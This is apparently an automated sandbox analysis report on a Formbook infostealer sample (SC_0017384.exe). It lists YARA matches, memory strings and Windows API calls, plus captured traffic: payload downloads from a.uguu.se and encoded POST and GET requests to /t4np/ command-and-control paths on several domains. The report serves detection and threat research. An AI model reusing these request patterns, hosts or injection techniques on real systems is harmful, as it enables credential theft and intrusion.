Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.casar.com/assunto/organizacao/
Source: M61Ae5o9b.8.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-N7Z9MZC
Source: Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp, SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp, Lvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: explorer.exe, 00000004.00000002.594853816.0000000015F5C000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005C7C000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.583099802.00000000079A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/casarpontocom
Source: unknown HTTP traffic detected: POST /t4np/ HTTP/1.1Host: www.emprendizajesocial.comConnection: closeContent-Length: 190Cache-Control: no-cacheOrigin: http://www.emprendizajesocial.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.emprendizajesocial.com/t4np/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 65 6b 44 57 64 58 6d 78 3d 74 53 67 53 46 6d 4e 55 59 35 38 65 4d 74 73 57 28 58 79 41 56 6c 64 6e 39 42 43 72 31 71 54 51 4f 42 64 6a 6d 49 44 54 4d 68 32 50 45 5a 4c 71 36 69 4d 32 64 4a 77 4c 36 38 32 47 5a 43 64 78 48 68 48 46 55 56 5a 5a 58 4e 70 61 59 45 52 61 28 74 4a 48 54 42 48 4e 59 5a 4b 68 56 73 68 45 79 6f 4d 30 5a 48 4a 59 56 54 6e 61 46 7a 4f 55 38 65 57 49 46 48 4a 63 6b 32 41 63 71 31 6e 62 6f 6c 33 44 77 6a 56 36 50 5a 46 42 33 5a 69 37 34 42 42 65 68 63 6e 44 7e 4b 41 56 6f 69 37 75 55 48 48 44 47 6d 62 76 41 4c 63 4a 36 45 64 55 4a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ekDWdXmx=tSgSFmNUY58eMtsW(XyAVldn9BCr1qTQOBdjmIDTMh2PEZLq6iM2dJwL682GZCdxHhHFUVZZXNpaYERa(tJHTBHNYZKhVshEyoM0ZHJYVTnaFzOU8eWIFHJck2Acq1nbol3DwjV6PZFB3Zi74BBehcnD~KAVoi7uUHHDGmbvALcJ6EdUJQ).
Source: unknown DNS traffic detected: queries for: a.uguu.se
Source: global traffic HTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fwvfviJb.dat HTTP/1.1Host: a.uguu.seConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=yKIXTmp5dZbzu0kOoimFYUx0Rf1qUZs10N2udgS/CtBUsUx15VFtNYN9iDnYFh77a6AF4rH5pFyFnuGOqSZvoPy3IjvUZKwOXw== HTTP/1.1Host: www.findmyoriginstory.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g== HTTP/1.1Host: www.emprendizajesocial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /t4np/?ekDWdXmx=TNgCDQM1NseJ/EyvbqZD4bEVgDXmfsqsK09kjaHK361RIlxqLtgkaoztB9HOqO+kj7AmSjC7tsKJawScM9XI/2xtyFPsJZxirw==&LAIu=TchAG45 HTTP/1.1Host: www.brunaeleandro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /t4np/?LAIu=TchAG45&ekDWdXmx=b7otzynn0HmortmfwUeY4rOKK/wDsahaMH4CpYcAMUMZFiGwLHjB+0Oq1wXjzAJPnkBdjV2xmRY1HYDRMeq0YWMvPw2aK61dkA== HTTP/1.1Host: www.madisoncountylincoln.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /t4np/?ekDWdXmx=yN4s0tXHCEK4GbHOxK129Y7foRrzq40ElafmJhvJj1LcshAib7Ivom6LHCQSa6JmmrJNk5dNV7FfRE38dwcSsWQdgWRuTjAoEA==&LAIu=TchAG45 HTTP/1.1Host: www.metatv.appConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown HTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49698 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.40.83.211:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001399000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: SC_0017384.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 0_2_016C6AA0 0_2_016C6AA0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 0_2_016C5390 0_2_016C5390
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 0_2_016C5317 0_2_016C5317
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 0_2_016CF390 0_2_016CF390
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 0_2_016C774D 0_2_016C774D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 0_2_016C7960 0_2_016C7960
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_00403853 3_2_00403853
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_00401B30 3_2_00401B30
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_004055B3 3_2_004055B3
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_00420633 3_2_00420633
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0040BF6F 3_2_0040BF6F
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0040BF73 3_2_0040BF73
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_004057D3 3_2_004057D3
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_004017D8 3_2_004017D8
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_004017E0 3_2_004017E0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01784120 3_2_01784120
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176F900 3_2_0176F900
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_018320A8 3_2_018320A8
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_018328EC 3_2_018328EC
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01821002 3_2_01821002
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0183E824 3_2_0183E824
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017920A0 3_2_017920A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177B090 3_2_0177B090
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182DBD2 3_2_0182DBD2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01832B28 3_2_01832B28
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179EBB0 3_2_0179EBB0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_018322AE 3_2_018322AE
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01760D20 3_2_01760D20
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_018325DD 3_2_018325DD
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01832D07 3_2_01832D07
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177D5E0 3_2_0177D5E0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01831D55 3_2_01831D55
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01792581 3_2_01792581
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177841F 3_2_0177841F
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182D466 3_2_0182D466
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01831FF1 3_2_01831FF1
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01786E30 3_2_01786E30
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01832EF7 3_2_01832EF7
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182D616 3_2_0182D616
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: String function: 0176B150 appears 35 times
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0041E543 NtCreateFile, 3_2_0041E543
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0041E5F3 NtReadFile, 3_2_0041E5F3
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0041E673 NtClose, 3_2_0041E673
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0041E723 NtAllocateVirtualMemory, 3_2_0041E723
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_017A9910
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A99A0 NtCreateSection,LdrInitializeThunk, 3_2_017A99A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_017A9860
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9840 NtDelayExecution,LdrInitializeThunk, 3_2_017A9840
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A98F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_017A98F0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9A50 NtCreateFile,LdrInitializeThunk, 3_2_017A9A50
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9A20 NtResumeThread,LdrInitializeThunk, 3_2_017A9A20
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_017A9A00
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9540 NtReadFile,LdrInitializeThunk, 3_2_017A9540
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A95D0 NtClose,LdrInitializeThunk, 3_2_017A95D0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9710 NtQueryInformationToken,LdrInitializeThunk, 3_2_017A9710
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9FE0 NtCreateMutant,LdrInitializeThunk, 3_2_017A9FE0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A97A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_017A97A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9780 NtMapViewOfSection,LdrInitializeThunk, 3_2_017A9780
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_017A9660
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A96E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_017A96E0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9950 NtQueueApcThread, 3_2_017A9950
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A99D0 NtCreateProcessEx, 3_2_017A99D0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017AB040 NtSuspendThread, 3_2_017AB040
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9820 NtEnumerateKey, 3_2_017A9820
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A98A0 NtWriteVirtualMemory, 3_2_017A98A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9B00 NtSetValueKey, 3_2_017A9B00
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017AA3B0 NtGetContextThread, 3_2_017AA3B0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9A10 NtQuerySection, 3_2_017A9A10
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9A80 NtOpenDirectoryObject, 3_2_017A9A80
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9560 NtWriteFile, 3_2_017A9560
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017AAD30 NtSetContextThread, 3_2_017AAD30
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9520 NtWaitForSingleObject, 3_2_017A9520
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A95F0 NtQueryInformationFile, 3_2_017A95F0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9770 NtSetInformationFile, 3_2_017A9770
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017AA770 NtOpenThread, 3_2_017AA770
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9760 NtOpenProcess, 3_2_017A9760
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9730 NtQueryVirtualMemory, 3_2_017A9730
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017AA710 NtOpenProcessToken, 3_2_017AA710
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9670 NtQueryInformationProcess, 3_2_017A9670
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9650 NtQueryValueKey, 3_2_017A9650
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A9610 NtEnumerateValueKey, 3_2_017A9610
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A96D0 NtCreateKey, 3_2_017A96D0
Source: SC_0017384.exe, 00000000.00000002.385968571.000000000419A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameXnrxjhztihgifcu.dll" vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000000.299213508.0000000000D98000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNevqazdmhd.exe" vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.400969818.00000000068FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNevqazdmhd.exe" vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameXnrxjhztihgifcu.dll" vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001399000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.400969818.00000000068AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
Source: SC_0017384.exe, 00000003.00000003.381474937.0000000001523000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs SC_0017384.exe
Source: SC_0017384.exe, 00000003.00000003.383573088.00000000016CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs SC_0017384.exe
Source: SC_0017384.exe, 00000003.00000002.432025851.000000000185F000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs SC_0017384.exe
Source: SC_0017384.exe Binary or memory string: OriginalFilenameNevqazdmhd.exe" vs SC_0017384.exe
Source: SC_0017384.exe ReversingLabs: Detection: 12%
Source: SC_0017384.exe Virustotal: Detection: 17%
Source: C:\Users\user\Desktop\SC_0017384.exe File read: C:\Users\user\Desktop\SC_0017384.exe
Source: SC_0017384.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
